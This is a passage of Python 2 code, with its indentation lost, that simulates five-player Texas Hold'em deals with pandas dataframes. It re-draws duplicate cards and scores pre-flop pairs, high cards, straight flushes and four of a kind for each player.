df1.iloc[i * 4 + k - 1, 3]) \
or (df4.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 3]) \
or (df4.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 3]) \
or (df4.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 3]) \
or (df4.iloc[i * 4 + k - 1, 0] == df5.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df5.iloc[i * 4 + k - 1, 3])\
or (df4.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 0] and df4.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 1])\
or (df4.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 0] and df4.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 9"
# Generate 1st card for P5
df5.iloc[i * 4 + k - 1, 0] = random.randrange(1, 5)
df5.iloc[i * 4 + k - 1, 1] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df5.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 1]) \
or (df5.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df5.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 3]) \
or (df5.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 3]) \
or (df5.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 3]) \
or (df5.iloc[i * 4 + k - 1, 0] == df5.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df5.iloc[i * 4 + k - 1, 3])\
or (df5.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 1])\
or (df5.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 1]) \
or (df5.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
list = []
df1.iloc[i * 4 + k - 1, 14] = 0
df2.iloc[i * 4 + k - 1, 14] = 0
df3.iloc[i * 4 + k - 1, 14] = 0
df4.iloc[i * 4 + k - 1, 14] = 0
df5.iloc[i * 4 + k - 1, 14] = 0
#Pre-flop Hand evaluation
#Evaluate each player's hand for a pair
if df1.iloc[i * 4 + k - 1, 1] == df1.iloc[i * 4 + k - 1, 3]:
list.append(df1.iloc[i * 4 + k - 1, 1])
if df2.iloc[i * 4 + k - 1, 1] == df2.iloc[i * 4 + k - 1, 3]:
list.append(df2.iloc[i * 4 + k - 1, 1])
if df3.iloc[i * 4 + k - 1, 1] == df3.iloc[i * 4 + k - 1, 3]:
list.append(df3.iloc[i * 4 + k - 1, 1])
if df4.iloc[i * 4 + k - 1, 1] == df4.iloc[i * 4 + k - 1, 3]:
list.append(df4.iloc[i * 4 + k - 1, 1])
if df5.iloc[i * 4 + k - 1, 1] == df5.iloc[i * 4 + k - 1, 3]:
list.append(df5.iloc[i * 4 + k - 1, 1])
#Check if more than one player have a pair
if (len(list) > 1):
winner = max(list)
if df1.iloc[i * 4 + k - 1, 1] == winner and df1.iloc[i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner and df2.iloc[i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner and df3.iloc[i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner and df4.iloc[i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner and df5.iloc[i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
#Check if only one player has a pair
elif (len(list) == 1):
winner = max(list)
if df1.iloc[i * 4 + k - 1, 1] == winner and df1.iloc[i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
elif df2.iloc[i * 4 + k - 1, 1] == winner and df2.iloc[i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
elif df3.iloc[i * 4 + k - 1, 1] == winner and df3.iloc[i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
elif df4.iloc[i * 4 + k - 1, 1] == winner and df4.iloc[i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
elif df5.iloc[i * 4 + k - 1, 1] == winner and df5.iloc[i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
#Evaluate for the high card
else:
winner = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],)
if df1.iloc[i * 4 + k - 1, 1] == winner or df1.iloc[i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner or df2.iloc[i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner or df3.iloc[i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner or df4.iloc[i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner or df5.iloc[i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
# Create Flop Round
if k == 2:
df1.loc[i * 4 + k-1] = df1.loc[i * 4 + k - 2]
df2.loc[i * 4 + k - 1] = df2.loc[i * 4 + k - 2]
df3.loc[i * 4 + k - 1] = df3.loc[i * 4 + k - 2]
df4.loc[i * 4 + k - 1] = df4.loc[i * 4 + k - 2]
df5.loc[i * 4 + k - 1] = df5.loc[i * 4 + k - 2]
while x == 0:
print "Step 10"
#Generate 1st community card
df1.iloc[i * 4 + k-1, 4] = random.randrange(1, 5)
df1.iloc[i * 4 + k-1, 5] = random.randrange(2, 15)
df2.iloc[i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df2.iloc[i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
df3.iloc[i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df3.iloc[i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
df4.iloc[i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df4.iloc[i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
df5.iloc[i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df5.iloc[i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k-1, 4] == df1.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df1.iloc[i * 4 + k-1, 3]) \
or (df1.iloc[i * 4 + k-1, 4] == df1.iloc[i * 4 + k-1, 0] and df1.iloc[i * 4 + k-1, 5] == df1.iloc[i * 4 + k-1, 1])\
or (df1.iloc[i * 4 + k-1, 4] == df2.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df2.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 4] == df3.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df3.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 4] == df4.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df4.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 4] == df5.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df5.iloc[i * 4 + k-1, 3]) \
or (df1.iloc[i * 4 + k - 1, 4] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 5] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 4] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 5] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 4] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 5] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 4] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 5] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 11"
# Generate 2nd community card
df1.iloc[i * 4 + k-1, 6] = random.randrange(1, 5)
df1.iloc[i * 4 + k-1, 7] = random.randrange(2, 15)
df2.iloc[i * 4 + k-1, 6] = df1.iloc[i * 4 + k-1, 6]
df2.iloc[i * 4 + k-1, 7] = df1.iloc[i * 4 + k-1, 7]
df3.iloc[i * 4 + k-1, 6] = df1.iloc[i * 4 + k-1, 6]
df3.iloc[i * 4 + k-1, 7] = df1.iloc[i * 4 + k-1, 7]
df4.iloc[i * 4 + k-1, 6] = df1.iloc[i * 4 + k-1, 6]
df4.iloc[i * 4 + k-1, 7] = df1.iloc[i * 4 + k-1, 7]
df5.iloc[i * 4 + k-1, 6] = df1.iloc[i * 4 + k-1, 6]
df5.iloc[i * 4 + k-1, 7] = df1.iloc[i * 4 + k-1, 7]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k-1, 6] == df1.iloc[i * 4 + k-1, 4] and df1.iloc[i * 4 + k-1, 7] == df1.iloc[i * 4 + k-1, 5]) \
or (df1.iloc[i * 4 + k-1, 6] == df1.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df1.iloc[i * 4 + k-1, 3]) \
or (df1.iloc[i * 4 + k-1, 6] == df1.iloc[i * 4 + k-1, 0] and df1.iloc[i * 4 + k-1, 7] == df1.iloc[i * 4 + k-1, 1])\
or (df1.iloc[i * 4 + k-1, 6] == df2.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df2.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 6] == df3.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df3.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 6] == df4.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df4.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 6] == df5.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df5.iloc[i * 4 + k-1, 3]) \
or (df1.iloc[i * 4 + k - 1, 6] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 7] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 6] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 7] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 6] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 7] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 6] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 7] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 12"
#Generate 3rd community card
df1.iloc[i * 4 + k-1, 8] = random.randrange(1, 5)
df1.iloc[i * 4 + k-1, 9] = random.randrange(2, 15)
df2.iloc[i * 4 + k-1, 8] = df1.iloc[i * 4 + k-1, 8]
df2.iloc[i * 4 + k-1, 9] = df1.iloc[i * 4 + k-1, 9]
df3.iloc[i * 4 + k-1, 8] = df1.iloc[i * 4 + k-1, 8]
df3.iloc[i * 4 + k-1, 9] = df1.iloc[i * 4 + k-1, 9]
df4.iloc[i * 4 + k-1, 8] = df1.iloc[i * 4 + k-1, 8]
df4.iloc[i * 4 + k-1, 9] = df1.iloc[i * 4 + k-1, 9]
df5.iloc[i * 4 + k-1, 8] = df1.iloc[i * 4 + k-1, 8]
df5.iloc[i * 4 + k-1, 9] = df1.iloc[i * 4 + k-1, 9]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k - 1, 8] == df1.iloc[i * 4 + k - 1, 6] and df1.iloc[i * 4 + k - 1, 9] == df1.iloc[
i * 4 + k - 1, 7]) \
or (df1.iloc[i * 4 + k - 1, 8] == df1.iloc[i * 4 + k - 1, 4] and df1.iloc[i * 4 + k - 1, 9] ==
df1.iloc[i * 4 + k - 1, 5]) \
or (df1.iloc[i * 4 + k - 1, 8] == df1.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 8] == df1.iloc[i * 4 + k - 1, 0] and df1.iloc[i * 4 + k - 1, 9] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df1.iloc[i * 4 + k - 1, 8] == df2.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df2.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 8] == df3.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df3.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 8] == df4.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df4.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 8] == df5.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df5.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 8] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 9] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 8] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 9] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 8] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 9] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 8] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 9] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
df2.iloc[i * 4 + k - 1, 4] = df3.iloc[i * 4 + k - 1, 4] = df4.iloc[i * 4 + k - 1, 4] = df5.iloc[
i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df2.iloc[i * 4 + k - 1, 5] = df3.iloc[i * 4 + k - 1, 5] = df4.iloc[i * 4 + k - 1, 5] = df5.iloc[
i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
df2.iloc[i * 4 + k - 1, 6] = df3.iloc[i * 4 + k - 1, 6] = df4.iloc[i * 4 + k - 1, 6] = df5.iloc[
i * 4 + k - 1, 6] = df1.iloc[i * 4 + k - 1, 6]
df2.iloc[i * 4 + k - 1, 7] = df3.iloc[i * 4 + k - 1, 7] = df4.iloc[i * 4 + k - 1, 7] = df5.iloc[
i * 4 + k - 1, 7] = df1.iloc[i * 4 + k - 1, 7]
df2.iloc[i * 4 + k - 1, 8] = df3.iloc[i * 4 + k - 1, 8] = df4.iloc[i * 4 + k - 1, 8] = df5.iloc[
i * 4 + k - 1, 8] = df1.iloc[i * 4 + k - 1, 8]
df2.iloc[i * 4 + k - 1, 9] = df3.iloc[i * 4 + k - 1, 9] = df4.iloc[i * 4 + k - 1, 9] = df5.iloc[
i * 4 + k - 1, 9] = df1.iloc[i * 4 + k - 1, 9]
#Flop hand evaluation
x = 0
list = [-1,-1,-1,-1,-1]
df1.iloc[i * 4 + k - 1, 14] = 0
df2.iloc[i * 4 + k - 1, 14] = 0
df3.iloc[i * 4 + k - 1, 14] = 0
df4.iloc[i * 4 + k - 1, 14] = 0
df5.iloc[i * 4 + k - 1, 14] = 0
#Straight Flush Evaluation
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
#P1 Evaluation
#With Ace Low
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
for m in range (0,5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0]+1 == list[1] and list[1]+1 == list[2] and list[2]+1 == list[3] and list[3]+1 == list[4]:
a1 = max(list[0],list[1],list[2],list[3],list[4])
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a1 = 0
# With Ace High
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0]+1 == list[1] and list[1]+1 == list[2] and list[2]+1 == list[3] and list[3]+1 == list[4]:
a1 = max(list[0],list[1],list[2],list[3],list[4])
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a1 = 0
#P2 Evaluation
#With Ace Low
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a2 = 0
#With Ace High
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a2 = 0
# P3 Evaluation
# With Ace Low
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == \
list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a3 = 0
#With Ace High
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a3 = 0
# P4 Evaluation
# With Ace Low
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == \
list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a4 = 0
#With Ace High
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a4 = 0
# P5 Evaluation
# With Ace Low
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == \
list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a5 = 0
#With Ace High
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
SF = SF + 1
else:
a5 = 0
#Check for Straight flush
if (SF > 0):
print "Straight Flush"
b = max(a1,a2,a3,a4,a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for four of a kind
FK = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
#Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a1 = list[0]
#Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a2 = list[0]
#Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a3 = list[0]
#Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
